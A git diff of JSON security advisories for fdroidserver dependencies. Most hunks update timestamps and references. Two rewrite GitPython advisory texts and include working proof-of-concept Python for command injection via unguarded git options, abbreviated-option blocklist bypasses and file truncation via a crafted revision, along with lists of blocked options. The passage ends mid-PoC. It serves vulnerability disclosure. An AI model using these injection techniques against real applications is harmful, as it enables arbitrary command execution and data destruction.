"PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44244.json b/advisories/BREW-fdroidserver-CVE-2026-44244.json index b95c967ef05..5ac6019d4c4 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44244.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44244", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44307.json b/advisories/BREW-fdroidserver-CVE-2026-44307.json index bfda37b1e40..6dd7bb13145 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44307.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44307.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44307", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-2h4p-vjrc-8xpq", "CVE-2026-44307", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44405.json b/advisories/BREW-fdroidserver-CVE-2026-44405.json index f7755596b87..5a96b1ad3c6 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44405.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44405", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44431.json b/advisories/BREW-fdroidserver-CVE-2026-44431.json index 2408171ebd2..af6162ccb0a 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44431.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44431", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44432.json b/advisories/BREW-fdroidserver-CVE-2026-44432.json index 52938fbf164..b603e721ac7 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44432.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44432", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-4539.json b/advisories/BREW-fdroidserver-CVE-2026-4539.json index 728aef66d11..b37a72fa33b 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-4539.json +++ b/advisories/BREW-fdroidserver-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-4539", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-45409.json b/advisories/BREW-fdroidserver-CVE-2026-45409.json index beabf7cd2bb..47f60d4ace2 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-45409.json +++ b/advisories/BREW-fdroidserver-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-45409", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-67322.json b/advisories/BREW-fdroidserver-CVE-2026-67322.json index 0d5d3cf6afd..3ff172389bb 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67322.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67322", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-67323.json b/advisories/BREW-fdroidserver-CVE-2026-67323.json index dc6449ba87b..b791368447b 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67323.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67323", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-67324.json b/advisories/BREW-fdroidserver-CVE-2026-67324.json index bb2a94dd6d0..cdbb9b0c85e 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67324.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67324", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-67325.json b/advisories/BREW-fdroidserver-CVE-2026-67325.json index a204a5bdcd9..551257d14cf 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67325.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67325", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, 